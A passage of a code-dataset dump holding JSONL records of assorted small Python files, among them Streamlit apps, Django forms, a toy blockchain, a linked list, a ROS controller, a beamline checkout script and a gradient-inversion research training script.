in columnas_numericas]\n\n# Mapeamos la opción booleana a un texto\n# y la agregamos para la predicción junto a\n# las variables númericas\nraintoday_option_mapping = {'Sí': 1, 'No': 0}\nraintoday_option = st.selectbox('¿Hoy llovió?',\n list(raintoday_option_mapping.keys()))\n\nall_features = features + [raintoday_option_mapping[raintoday_option]]\n\ndata_para_predecir = pd.DataFrame([all_features],\n columns=feature_names)\n\n# Hacemos las predicciones con el input del front\npred_reg = pipeline_reg.predict(data_para_predecir)\npred_clas = pipeline_clas.predict(data_para_predecir)\n\n# Mostramos las predicciones en la app\n\nresultado_clas = '**sí** 🌧️' if pred_clas else '**no** 🌞'\nrespuesta_reg = 'y' if pred_clas else 'pero'\nresultado_reg = round(float(pred_reg[0][0]), 2)\n\nst.markdown(f'Probablemente mañana {resultado_clas} llueva {respuesta_reg} caigan {resultado_reg} mm/h de lluvia.')","repo_name":"Isaiasgaray/aa_1","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2014,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18194133402","text":"from typing import Dict, Type\n\nfrom bofire.data_models.outlier_detection import api as data_models\nfrom bofire.outlier_detection.outlier_detection import (\n IterativeTrimming,\n OutlierDetection,\n)\n\nOUTLIER_MAP: Dict[Type[data_models.OutlierDetection], Type[OutlierDetection]] = {\n data_models.IterativeTrimming: IterativeTrimming,\n}\n\n\ndef map(data_model: data_models.OutlierDetection) -> OutlierDetection:\n cls = OUTLIER_MAP[data_model.__class__]\n return cls(data_model=data_model) # type: ignore\n","repo_name":"experimental-design/bofire","sub_path":"bofire/outlier_detection/mapper.py","file_name":"mapper.py","file_ext":"py","file_size_in_byte":513,"program_lang":"python","lang":"en","doc_type":"code","stars":83,"dataset":"github-code","pt":"37"} +{"seq_id":"1200015265","text":"import time\nfrom hashlib import sha256\nfrom storages import Storage, InMemoryStorage\n\nclass Block:\n\n def __init__(self, *args, **kwargs):\n \n if len(args) > 0:\n prev_hash = args[0]\n elif 'prev_hash' in kwargs:\n prev_hash = kwargs.pop('prev_hash')\n else:\n raise ValueError\n\n if type(prev_hash) != str:\n prev_hash = hex(prev_hash)\n\n if len(args) > 1:\n difficulty = args[1]\n elif 'difficulty' in kwargs:\n difficulty = kwargs.pop('difficulty')\n else:\n raise ValueError\n\n self.transactions = []\n self.states = {}\n\n self.header = {\n 'prev_hash': prev_hash,\n 'timestamp': int(time.time()),\n 'nonce': 0,\n 'difficulty': difficulty,\n 'data_hash': hash((self.transactions, self.states))\n }\n\n def __repr__(self):\n return str({\n 'header': self.header,\n 'body': {\n 'transactions': self.transactions,\n 'states': self.states\n }\n })\n\n def __hash__(self):\n return sha256(str(self.header)).hexdigest()\n\n def find_nonce(self):\n self.header['nonce'] = 0\n difficulty = self.header['difficulty']\n while hash(self)[:difficulty] != '0'*difficulty:\n self.header['nonce'] += 1\n\n def verify(self):\n difficulty = self.header['difficulty']\n return self.__hash__()[:difficulty] == '0'*difficulty\n\n def add_transaction(self, txn):\n self.transactions.append(txn)\n\nclass Blockchain:\n\n default_storage_class = InMemoryStorage\n default_genesis = Block(hex(0))\n\n def __init__(self, *args, **kwargs):\n self._storage_class = kwargs.pop('storage', self.default_storage_class)\n genesis = kwargs.pop('genesis', self.default_genesis)\n self._storage = self._storage_class(*args, **kwargs) \n self._storage.put_block(genesis)\n self._transaction_pool = []\n\n def add_block(self, block: Block):\n assert block.header['prev_hash'] in self\n assert block.verify()\n self._storage.put_block(block)\n\n def create_transaction(self):\n pass\n\n def __contains__(self, block_hash):\n return block_hash in self._storage\n\n\n","repo_name":"z0marlin/DCA","sub_path":"blockchain.py","file_name":"blockchain.py","file_ext":"py","file_size_in_byte":2315,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"42545089300","text":"from django import forms\nfrom django.forms import ModelForm\nfrom .models import screen,row,seat,film,showing,Booking\nfrom django.contrib.admin.widgets import AdminSplitDateTime,AdminDateWidget,AdminTimeWidget\nfrom django.core.exceptions import ValidationError\nfrom django.utils import timezone\n\n\n#Screen Forms\nclass ScreenForm(ModelForm):\n class Meta:\n model = screen\n fields = \"__all__\"\n\nclass RowForm(ModelForm):\n class Meta:\n model = row\n fields = \"__all__\"\n\nclass SeatForm(ModelForm):\n class Meta:\n model = seat\n fields = \"__all__\"\nclass FilmForm(ModelForm):\n class Meta:\n model = film\n fields = \"__all__\"\nclass ShowingForm(ModelForm):\n \n class Meta:\n model = showing\n fields = (\"date\",\"startTime\",\"film\",\"screen\")\n\nclass BookingForm(ModelForm):\n \n class Meta:\n model = Booking\n fields = (\"student_tickets\",\"child_tickets\",\"adult_tickets\")\n\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n \n def save(self, commit=True):\n instance = super().save(commit=False)\n student_tickets = self.cleaned_data['student_tickets']\n child_tickets = self.cleaned_data['child_tickets']\n adult_tickets = self.cleaned_data['adult_tickets']\n #instance.user = current_user\n instance.student_tickets = student_tickets\n instance.child_tickets = child_tickets\n instance.adult_tickets = adult_tickets\n # instance.total_price = calculate_total_price(instance.showing, student_tickets, child_tickets, adult_tickets)\n if commit:\n instance.save()\n return instance\n\nclass BookingForm_cr(ModelForm):\n \n class Meta:\n model = Booking\n fields = (\"cr_tickets\",)\n\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n \n def save(self, commit=True):\n instance = super().save(commit=False)\n cr_tickets = self.cleaned_data[\"cr_tickets\"]\n\n instance.cr_tickets = cr_tickets\n\n # instance.total_price = calculate_total_price(instance.showing, student_tickets, child_tickets, adult_tickets)\n if commit:\n instance.save()\n return instance\n\n\n# booking guest\nclass BookingForm_g(ModelForm):\n \n class Meta:\n model = Booking\n fields = (\"adult_tickets\",\"child_tickets\",)\n\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n \n def save(self, commit=True):\n instance = super().save(commit=False)\n \n child_tickets = self.cleaned_data['child_tickets']\n adult_tickets = self.cleaned_data['adult_tickets']\n\n instance.child_tickets = child_tickets\n instance.adult_tickets = adult_tickets\n\n # instance.total_price = calculate_total_price(instance.showing, student_tickets, child_tickets, adult_tickets)\n if commit:\n instance.save()\n return instance\n\n\n# class BookingForm_cr(ModelForm):\n \n# class Meta:\n# model = Booking\n# fields = (\"cr_tickets\", \"showing\")","repo_name":"fyates1/UWEFlix-Group-6","sub_path":"uweflix/cinema/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":3114,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"73842629547","text":"class MyNode:\n\n def __init__(self, value):\n self.value = value\n self.next = None\n\n def pointTo(self, node):\n self.next = node\n \n def __str__(self):\n return str(f'{self.value} --> {self.next}')\n\nclass MyLinkedList:\n\n def __init__(self, value):\n self.head = MyNode(value)\n self.tail = self.head\n self.length = 1\n\n def append(self, value):\n newNode = MyNode(value)\n self.tail.pointTo(newNode)\n self.tail = newNode\n self.length += 1\n\n def prepend(self, value):\n newNode = MyNode(value)\n newNode.pointTo(self.head)\n self.head = newNode\n self.length += 1\n\n def traverseToIndex(self, index):\n currentNode = self.head\n i = 0\n while(i < index and index < self.length):\n currentNode = currentNode.next\n i += 1\n\n return currentNode\n\n def insert(self, index, value):\n\n if (index == 0):\n self.prepend(value)\n return\n elif (index >= self.length):\n self.append(value)\n return\n \n newNode = MyNode(value)\n nodeBefore = self.traverseToIndex(index-1)\n \n newNode.pointTo(nodeBefore.next)\n nodeBefore.pointTo(newNode)\n\n self.length += 1\n \n def remove(self, index):\n nodeBefore = self.traverseToIndex(index-1)\n nodeToDelete = nodeBefore.next \n nodeBefore.pointTo(nodeToDelete.next)\n if (index+1 >= self.length):\n self.tail = nodeBefore\n del nodeToDelete\n self.length -= 1\n\n def reverse(self):\n prevNode = None\n currentNode = self.head\n nextNode = currentNode.next\n\n while(nextNode):\n tempNode = nextNode.next\n nextNode.pointTo(currentNode)\n currentNode.pointTo(prevNode)\n prevNode = currentNode\n currentNode = nextNode\n nextNode = tempNode\n\n self.head, self.tail = self.tail, self.head\n\n # Function for the class to return something readable\n def __str__(self):\n return str(self.head)\n\nmyLinkedList = MyLinkedList(10)\nprint(myLinkedList)\nmyLinkedList.append(5)\nmyLinkedList.append(16)\nmyLinkedList.prepend(1)\nprint(myLinkedList)\nmyLinkedList.insert(2, 4)\nprint(myLinkedList)\nmyLinkedList.insert(6, 3)\nprint(myLinkedList)\nmyLinkedList.remove(1)\nprint(myLinkedList)\nmyLinkedList.remove(4)\nprint(myLinkedList)\n\nmyLinkedList.reverse()\nprint(myLinkedList)\n\n# ----- Pointers\ndef pointers():\n object = { 'a': True }\n pointer = object\n\n object['a'] = 'booya'\n\n del object\n\n print(f'The pointer value is: {pointer}')\n # print(f'The object value is: {object}') # This sends an error because the variable `object` was deleted\n\npointers()","repo_name":"JuanRCifuentes/Data-Structures---Algorithms","sub_path":"Data_Structures/linked_lists.py","file_name":"linked_lists.py","file_ext":"py","file_size_in_byte":2787,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"23236554449","text":"# Preguntar al usuario la cantidad a invertir, el interés anual y el número de años\r\ncantidad_invertida = float(input(\"Ingresa la cantidad a invertir: \"))\r\ninteres_anual = float(input(\"Ingresa el interés anual en porcentaje: \"))\r\naños = int(input(\"Ingresa el número de años: \"))\r\n\r\n# Calcular el capital obtenido en la inversión\r\ncapital_obtenido = cantidad_invertida * (1 + (interes_anual / 100)) ** años\r\n\r\n# Mostrar el capital obtenido en la inversión\r\nprint(\"El capital obtenido en la inversión es de:\", round(capital_obtenido, 2))\r\n","repo_name":"Alexandercs19/Practicas-Basicas-Python","sub_path":"Tareas Python/InversionCapital.py","file_name":"InversionCapital.py","file_ext":"py","file_size_in_byte":548,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"39899791659","text":"def wordtCount(text):\n dicto = {}\n lst = text.split()\n lst.sort()\n for word in lst:\n if word in dicto:\n dicto[word]= dicto[word] + 1\n else:\n dicto[word] = 1\n for word in dicto:\n if dicto[word] == 1:\n verb = \" time\"\n else:\n verb = \" times\"\n\n print(word,\" appears \"+ str(dicto[word]) + verb)\n\ntext = \"all animals are equal but some animals are more equal than other\"\nwordtCount(text)\n","repo_name":"Gunglarino/python","sub_path":"lesExcercises/week1-5/dictLes9.py","file_name":"dictLes9.py","file_ext":"py","file_size_in_byte":476,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"7473958753","text":"\"\"\"\nIntroduction\n============\n\nThese scripts use the IOC-defined bypass tools, meaning that no lenses will be\nmoved and photon energy does _not_ need to change.\n\nPerforming a checkout\n=====================\n\nFirst, load an IPython session with this module.\n\n $ source /reg/g/pcds/pyps/conda/pcds_conda\n $ ipython -i -m transfocate.automated_checkout\n\nIf the above times out, re-run the script. It's ophyd related and will be\nresolved eventually. Otherwise, continue on.\n\nManual mode\n===========\n\nTo perform a scan for a single XRT lens, use:\n\n >>> sweep_and_plot_xrt(xrt_lens, num_steps=100)\n\nThis will choose different combinations of TFS lenses to span the region, and\nscan energy in 100 discrete steps.\n\nTo perform a scan for _all_ XRT lenses, use:\n\n >>> sweep_and_plot_xrt_all(num_steps=100)\n\nPer-lens data and plots will be saved to Excel and PNG/PDF files, respectively.\nThis can be combined into a full checkout report with the following:\n\n >>> generate_report()\n\nAutomatic mode\n==============\n\nAutomatic mode will perform ``sweep_and_plot_xrt_all()`` and\n``generate_report()`` for you.\n\nReport generation\n=================\n\nReport generation will use the files generated from the scan steps above.\nIt will only use existing files from the current directory.\n\nIt can be used on its own - after exiting the IPython session and reloading\nit - without scanning again.\n\n***************************************************************************\n***************************************************************************\nNow, you'll have the option to perform the steps automatically or manually.\n***************************************************************************\n***************************************************************************\n\n\"\"\"\nimport matplotlib # isort: skip\nimport time\n\ntry: # noqa\n matplotlib.use(\"Qt5Agg\") # noqa\nexcept Exception: # noqa\n ... # noqa\nimport bluesky\nimport databroker\nimport matplotlib.pyplot as plt\nfrom bluesky.callbacks import LiveTable\n\nimport transfocate\nimport transfocate.checkout\n\nfrom .table import generate_report\nfrom .table.info import MIN_ENERGY\nfrom .table.info import data as spreadsheet_data\n\nDESCRIPTION = __doc__\n\nlens_to_spreadsheet_df = {\n 0: spreadsheet_data[\"NO_LENS\"],\n 1: spreadsheet_data[\"LENS1_750\"],\n 2: spreadsheet_data[\"LENS2_428\"],\n 3: spreadsheet_data[\"LENS3_333\"],\n}\n\nfields = [\n \"energy\",\n \"trip_low\",\n \"trip_high\",\n \"faulted\",\n \"state_fault\",\n \"violated\",\n \"min_fault\",\n \"lens_required_fault\",\n \"table_fault\",\n \"tfs_radius\",\n \"xrt_radius\",\n]\n\n\ndef plot_sweeps():\n \"\"\"Plot the databroker results from a `sweep_energy_plan`.\"\"\"\n fig, axes = plt.subplots(\n ncols=2, nrows=2, constrained_layout=True, figsize=(18, 16)\n )\n plot_sweep_energy(0, ax=axes[0, 0], dbi=db[-4])\n plot_sweep_energy(1, ax=axes[0, 1], dbi=db[-3])\n plot_sweep_energy(2, ax=axes[1, 0], dbi=db[-2])\n plot_sweep_energy(3, ax=axes[1, 1], dbi=db[-1])\n fig.tight_layout()\n\n fn = \"summary\"\n plt.savefig(f\"{fn}.png\")\n plt.savefig(f\"{fn}.pdf\")\n\n\ndef plot_sweep_energy(xrt_lens, dbi, ax=None):\n \"\"\"Plot the databroker results from a `sweep_energy_plan`.\"\"\"\n df = dbi.table()\n df = df.set_index(df.energy)\n\n if ax is None:\n _, ax = plt.subplots(constrained_layout=True, figsize=(12, 10))\n\n plot_spreadsheet_data(xrt_lens, ax=ax, df=lens_to_spreadsheet_df[xrt_lens])\n\n ax.set_yscale(\"log\")\n\n df = df.copy()\n # **NOTE** for the purposes of plotting in log scale, set tfs_radius = 1\n # when zero in actuality\n df.loc[df.tfs_radius == 0.0, \"tfs_radius\"] = 1.0\n\n ax.scatter(\n df.energy, df.trip_high, label=\"Trip high [PLC]\", color=\"black\", marker=\"v\"\n )\n ax.scatter(\n df.energy, df.trip_low, label=\"Trip low [PLC]\", color=\"black\", marker=\"^\"\n )\n\n if False:\n when_faulted = df.where(df.faulted == 1).dropna()\n ax.scatter(\n when_faulted.index,\n when_faulted.tfs_radius,\n label=\"Scan point - fault\",\n color=\"red\",\n marker=\"x\",\n )\n else:\n when_faulted = df.where(df.min_fault == 1).dropna()\n ax.scatter(\n when_faulted.index,\n when_faulted.tfs_radius,\n label=\"Scan point - min energy fault\",\n color=\"red\",\n marker=\"x\",\n )\n\n when_faulted = df.where(df.lens_required_fault == 1).dropna()\n ax.scatter(\n when_faulted.index,\n when_faulted.tfs_radius,\n label=\"Scan point - lens required\",\n color=\"red\",\n marker=\"D\",\n )\n\n when_faulted = df.where(df.table_fault == 1).dropna()\n ax.scatter(\n when_faulted.index,\n when_faulted.tfs_radius,\n label=\"Scan point - table fault\",\n color=\"red\",\n marker=\"+\",\n )\n\n when_not_faulted = df.where(df.faulted == 0).dropna()\n ax.scatter(\n when_not_faulted.index,\n when_not_faulted.tfs_radius,\n color=\"black\",\n marker=\".\",\n s=3,\n label=\"Scan point - no fault\",\n )\n\n ax.set_ylim(1, 1e4)\n\n ax.legend(loc=\"upper right\")\n xrt_radius, *_ = list(df.xrt_radius)\n if xrt_radius == 0.0:\n ax.set_title(\"No pre-focusing lens\")\n else:\n ax.set_title(f\"Pre-focusing radius = {xrt_radius:.2f}um (Lens #{xrt_lens})\")\n return xrt_radius\n\n\ndef plot_spreadsheet_data(xrt_lens, ax, df):\n ax.fill_between(\n df.energy,\n df.trip_min,\n df.trip_max,\n where=(df.trip_max > df.trip_min),\n interpolate=True,\n color=\"red\",\n alpha=0.2,\n hatch=\"/\",\n )\n\n ax.plot(df.energy, df.trip_min, lw=1, color=\"black\", label=\"\")\n ax.plot(df.energy, df.trip_max, lw=1, color=\"black\", label=\"\")\n\n min_energy = MIN_ENERGY[xrt_lens]\n if min_energy > 0.0:\n ax.fill(\n (0, 0, min_energy, min_energy),\n (0, 1e4, 1e4, 0),\n color=\"red\",\n edgecolor=\"None\",\n alpha=0.2,\n hatch=\"\\\\\",\n )\n\n ax.set_yscale(\"log\")\n ax.set_ylabel(\"Reff [um]\")\n ax.set_xlabel(\"Energy [eV]\")\n return df\n\n\ndef sweep_and_plot_xrt(xrt_lens, num_steps=100):\n RE(\n transfocate.checkout.sweep_energy_plan(\n tfs, checkout, xrt_lens, num_steps=num_steps\n ),\n LiveTable(fields),\n )\n\n xrt_radius = plot_sweep_energy(xrt_lens, db[-1])\n fn = f\"pre_focus_{xrt_radius:.0f}um_lens_{xrt_lens}\"\n plt.savefig(f\"{fn}.png\")\n plt.savefig(f\"{fn}.pdf\")\n df = db[-1].table()[fields]\n df.to_excel(f\"{fn}.xlsx\")\n\n\ndef sweep_and_plot_xrt_all(num_steps):\n for lens_idx in [0, 1, 2, 3]:\n sweep_and_plot_xrt(lens_idx, num_steps=num_steps)\n\n plot_sweeps()\n\n\nif __name__ == \"__main__\":\n plt.ion()\n tfs = transfocate.Transfocator(\"MFX:LENS\", name=\"tfs\")\n checkout = transfocate.checkout.LensInterlockCheckout(\"MFX:LENS\", name=\"checkout\")\n db = databroker.Broker.named(\"temp\")\n RE = bluesky.RunEngine({})\n RE.subscribe(db.insert)\n tfs.interlock.limits.low.name = \"trip_low\"\n tfs.interlock.limits.high.name = \"trip_high\"\n tfs.interlock.faulted.name = \"faulted\"\n tfs.interlock.state_fault.name = \"state_fault\"\n tfs.interlock.violated_fault.name = \"violated\"\n tfs.interlock.min_fault.name = \"min_fault\"\n tfs.interlock.lens_required_fault.name = \"lens_required_fault\"\n tfs.interlock.table_fault.name = \"table_fault\"\n checkout.energy.name = \"energy\"\n tfs.tfs_radius.name = \"tfs_radius\"\n tfs.xrt_radius.name = \"xrt_radius\"\n\n print(\"Connecting to devices...\")\n\n try:\n time.sleep(2)\n tfs.wait_for_connection(timeout=5.0)\n checkout.wait_for_connection(timeout=5.0)\n except Exception as ex:\n print(\n \"\"\"\nSorry, trouble connecting to some devices. This happens occasionally at initialization.\nPlease re-try running this script.\n\"\"\"\n )\n raise ex\n\n print(DESCRIPTION)\n print(\"Run scans and generate report? ('yes' to continue)\")\n if input().lower() == \"yes\":\n print(\"Number of data points? Default: 50\")\n try:\n num_points = int(input().strip())\n except Exception:\n num_points = 50\n\n print(f\"Scanning with num_points={num_points}...\")\n sweep_and_plot_xrt_all(num_points)\n print(\"Generating report...\")\n generate_report()\n else:\n print(\"Manual mode.\")\n","repo_name":"pcdshub/transfocate","sub_path":"transfocate/automated_checkout.py","file_name":"automated_checkout.py","file_ext":"py","file_size_in_byte":8484,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"30496450189","text":"class Solution(object):\r\n def imageSmoother(self, M):\r\n \"\"\"\r\n :type M: List[List[int]]\r\n :rtype: List[List[int]]\r\n \"\"\"\r\n ret = []\r\n directions = [(-1, -1), (-1, 0), (-1, 1), (0, -1), (0, 1), (1, -1), (1, 0), (1, 1)]\r\n for i in range(0, len(M)):\r\n ret.append([])\r\n for j in range(0, len(M[0])):\r\n surrounding_sum = M[i][j]\r\n cnt = 1\r\n for di, dj in directions:\r\n new_i, new_j = i+di, j+dj\r\n if (0 <= new_i < len(M)) and (0 <= new_j < len(M[0])):\r\n surrounding_sum += M[new_i][new_j]\r\n cnt += 1\r\n ret[i].append(surrounding_sum // cnt)\r\n \r\n return ret","repo_name":"ycchhueannu/LeetCode","sub_path":"python/0661_Image_Smoother.py","file_name":"0661_Image_Smoother.py","file_ext":"py","file_size_in_byte":780,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"24324888028","text":"#!/usr/bin/env python3\nfrom move_validation.base_move_validation_step import BaseMoveValidationStep\nfrom literals import INVALID_MOVE_MESSAGES as invalid_msg\n\n\nclass ValidatePiece(BaseMoveValidationStep):\n \"\"\"\n Check move against piece.valid_moves\n \"\"\"\n\n\n def perform_check(self):\n \"\"\"\n Performs the check and sets up is_valid and invalid_reason properties\n :return: None\n \"\"\"\n if self.move_obj.move in [move[:2] for move in self.move_obj.piece.valid_moves]:\n self._is_valid = True\n else:\n self._invalid_reason = invalid_msg['piece']\n","repo_name":"Prosserc/python_chess","sub_path":"move_validation/validate_piece.py","file_name":"validate_piece.py","file_ext":"py","file_size_in_byte":610,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"15534796619","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport cv2, random, math\nfrom numpy import angle\nimport rospy, rospkg\nimport numpy as np\nfrom std_msgs.msg import Float64\nfrom TLight_revise import TLight\n\n\nclass Kookmin(object):\n\n def __init__(self) :\n self.rate = rospy.Rate(10)\n self.pubEgo_speed = rospy.Publisher(\"/commands/motor/speed\", Float64, queue_size=10)\n self.pubEgo_angle = rospy.Publisher(\"/commands/servo/position\", Float64, queue_size=10)\n self.tlight = TLight()\n\n\n def control(self) :\n \n self.tlight.detect() # 신호등 신호로 status 갱신\n\n if self.tlight.status < 2:\n custom_Ego_speed = 100.0\n custom_Ego_position = 0\n elif self.tlight.status == 2:\n custom_Ego_speed = 0\n custom_Ego_position = 0\n\n self.pubEgo_speed.publish(custom_Ego_speed)\n self.pubEgo_angle.publish(custom_Ego_position)\n \n self.rate.sleep()\n","repo_name":"Chokoty/kookmin_autopilot","sub_path":"kookmin/scripts/kookmin_tlight.py","file_name":"kookmin_tlight.py","file_ext":"py","file_size_in_byte":970,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"21242847592","text":"\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('order', '0001_initial'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='order',\n name='status',\n field=models.IntegerField(choices=[(0, 'Accepted'), (1, 'Completed'), (2, 'Canceled'), (3, 'Deleted')], default=0),\n ),\n ]\n","repo_name":"Amankaium/plovo","sub_path":"order/migrations/0002_alter_order_status.py","file_name":"0002_alter_order_status.py","file_ext":"py","file_size_in_byte":402,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"9665445263","text":"# Linked list using numpy.\n# Linked list its structure like a chain. Its different betweeen array.\n# There are some benifits about linked list, like easy to bolock implement, easy to intiertion, easy to deletation.\n#Code update.\n#At first we create a node block memory. \n\n# Structure of a Linked list look like:-\n # NodeA->NodeB->NodeC->NodeD->NodeE\n\nclass List:\n def __init__(self,num):\n self.data=num\n self.address=None\n\n#Then we linked a node with other nodes.\nclass linkedList:\n def __init__(self):\n self.head=None\n\n#Now we create the nodes.\n def create(self,num):\n newNode=List(num) # This line is important, its returned to the previous block memory (listNode) & triger to input a data.\n if self.head is None:\n self.head=newNode\n self.last=newNode\n else:\n self.last.address=newNode\n self.last=newNode\n def printList(self):\n temp=self.head\n while temp is not None:\n print(temp.data)\n temp=temp.address\n\n#Call the classes.\noop=linkedList()\noop.create(int(input(\"Enter a number: \")))\noop.create(int(input(\"Enter another number: \")))\nprint(\"Output:-\")\noop.printList()\n\n","repo_name":"aYgCOO/DSA-In-PY","sub_path":"DSA/Linear/Dynamic/Linked_list/linkedlist_using_numpy.py","file_name":"linkedlist_using_numpy.py","file_ext":"py","file_size_in_byte":1221,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"12928799937","text":"import argparse\nimport json\nimport os\nimport sys\n\n\ndef main():\n parser = argparse.ArgumentParser(\n 'Merges sources of a Dart target and its dependencies',\n fromfile_prefix_chars='@'\n )\n parser.add_argument(\n '--output',\n help='Path to output the final list',\n type=argparse.FileType('w'),\n required=True\n )\n parser.add_argument(\n '--depfile',\n help='Path to the depfile to generate',\n type=argparse.FileType('w'),\n required=True\n )\n parser.add_argument(\n '--sources',\n help='Sources of this target',\n nargs='*',\n )\n parser.add_argument(\n '--source_lists',\n help='Files containing lists of Dart sources',\n nargs='*'\n )\n args = parser.parse_args()\n\n args.depfile.write(\n '{}: {}\\n'.format(args.output.name, ' '.join(args.source_lists))\n )\n\n # Merges sources of this target, and all of its dependencies.\n all_sources = set(args.sources)\n for f in args.source_lists:\n with open(f, 'r') as f:\n all_sources.update(json.load(f))\n json.dump(sorted(all_sources), args.output)\n\n\nif __name__ == '__main__':\n sys.exit(main())\n","repo_name":"flutter/engine","sub_path":"tools/fuchsia/dart/merge_deps_sources.py","file_name":"merge_deps_sources.py","file_ext":"py","file_size_in_byte":1125,"program_lang":"python","lang":"en","doc_type":"code","stars":6866,"dataset":"github-code","pt":"37"} +{"seq_id":"30844667931","text":"import streamlit as st\r\nfrom PIL import Image\r\n\r\nst.set_page_config(page_title='Home', page_icon='')\r\n\r\nimage = Image.open('image_delivery.jpg')\r\n\r\nst.sidebar.image(image, width=150)\r\n\r\nst.sidebar.markdown('# Fome Zero')\r\nst.sidebar.markdown('## Restaurant Delivery')\r\nst.sidebar.markdown(\"\"\"___\"\"\")\r\n\r\nst.write('# Fome Zero Dashboard')\r\n\r\nst.markdown(\r\n \"\"\"\r\n Fome Zero Dashboard foi construido para acompanhar a Qualidade, Comida e Preços dos Restaurantes ao redor do Mundo.\r\n ### Como utilizar esses Dashboard?\r\n - Visão Países:\r\n - TOP 6 - Quantidade de Restaurantes registrados por País.\r\n - TOP 6 - Quantidade de Cidades registrados por País.\r\n - TOP 6 - Média de Avaliações feitas por País.\r\n - TOP 6 - Média de Preço de um prato para duas pessoas por País\r\n \r\n - Visão Cidades:\r\n - Top 10 Cidades com mais Restaurantes.\r\n - Top 7 Cidades com Restaurantes com Média de Avaliação acima de 4.\r\n - Top 7 Cidades com Restaurantes com Média de Avaliação abaixo de 2.5\r\n - Top 10 Cidades com Restaurante com Tipos de Culinárias distintos.\r\n \r\n - Visão Cuisines:\r\n - Top 10 Restaurantes.\r\n - Top 10 Melhores Tipos de Culinárias.\r\n - Top 10 Piores Tipos de Culinárias.\r\n ### Ask for help\r\n - Time de Data Science no Discord\r\n - ricardo_ninomiya#2135\r\n\r\n \"\"\"\r\n\r\n)","repo_name":"ricardoninomiya/ftc_fome_zero","sub_path":"Home.py","file_name":"Home.py","file_ext":"py","file_size_in_byte":1493,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"3030708216","text":"import torch\nimport argparse\nfrom models import Resnet50\nfrom utils import make_dir_if_not_exist, setup_seed\nfrom gen_attack import train_generator, Generator\n\ntorch.backends.cudnn.enabled = True\ntorch.backends.cudnn.benchmark = True\n\n\ndef parse_args():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--exp_name\", help=\"experiment name used to create folder\", default=\"exp_0\")\n parser.add_argument(\"--batch_size\", help=\"batch size for training\", default=24, type=int)\n parser.add_argument(\"--epochs\", help=\"epochs for training\", default=30, type=int)\n parser.add_argument(\"--device\", help=\"which device to use\", default=\"cuda:0\")\n parser.add_argument(\"--seed\", help=\"random seeds for experiments\", default=1225, type=int)\n return parser.parse_args()\n\n\nif __name__ == \"__main__\":\n args = parse_args()\n record_dir = f\"./data/train_generator/{args.exp_name}/\"\n make_dir_if_not_exist(record_dir)\n\n setup_seed(args.seed)\n resnet50 = Resnet50(pool=False)\n generator = Generator()\n\n train_generator(record_dir,\n args.batch_size,\n args.epochs,\n generator,\n resnet50,\n args.device)\n\n print(f\"finish training, see result in {record_dir}\")\n","repo_name":"pigeon-dove/FGLA","sub_path":"train_generator.py","file_name":"train_generator.py","file_ext":"py","file_size_in_byte":1280,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"37"} +{"seq_id":"73797720748","text":"from .font_constants import FONT_ARRAY\nfrom PIL import ImageFont\nfrom typing import List, Dict, Union\nfrom textwrap import wrap\nimport spacy\n\nnlp = spacy.blank(\"xx\")\nnlp.add_pipe('sentencizer')\n\ntry:\n from fontTools.ttLib import TTFont\nexcept:\n from fonttools.ttLib import TTFont\n\ndef get_text_width(text, font_size = 15, font = None):\n if font is None:\n font = get_best_font(text, FONT_ARRAY)\n font_path = font['path']\n font_obj = ImageFont.truetype(font_path, font_size)\n return font_obj.getlength(text)\n\ndef get_font_score(font, text):\n font_path = font['path']\n font = TTFont(font_path)\n\n # We check all chars for presence on the font\n valid_chars = 0\n for char in text:\n # We check if the char is in any table of the font\n for table in font['cmap'].tables:\n if ord(char) in table.cmap:\n valid_chars += 1\n break\n return valid_chars\n\ndef get_best_font(text, font_array):\n best_font = font_array[-1]\n best_font_points = 0\n text = text.replace('\\n', '').replace('\\r', '').replace('\\t', '').replace('\\u200B', '')\n for font in font_array:\n pts = get_font_score(font, text)\n if pts > best_font_points:\n best_font_points = pts\n best_font = font\n if best_font_points >= len(text):\n return font\n print(f'WARNING. NO OPTIMAL FONT FOUND, font: {best_font}, font score: {best_font_points}/{len(text)}, text \\\"{text}\\\"\\n')\n return best_font\n\n\ndef fit_words_within_width(words: Union[list[str], str], font: ImageFont.FreeTypeFont, insert_space: bool):\n new_text = \"\"\n space = \" \" if insert_space else \"\"\n for word in words:\n last_sentence = new_text.split(\"\\n\")[-1] + word + space\n if font.getlength(text=last_sentence) >= 240:\n if new_text.split(\"\\n\")[-1] != \"\":\n new_text += \"\\n\"\n new_text += fit_words_within_width(word, font, False) + space\n else:\n new_text += word + space\n\n return new_text\n\ndef 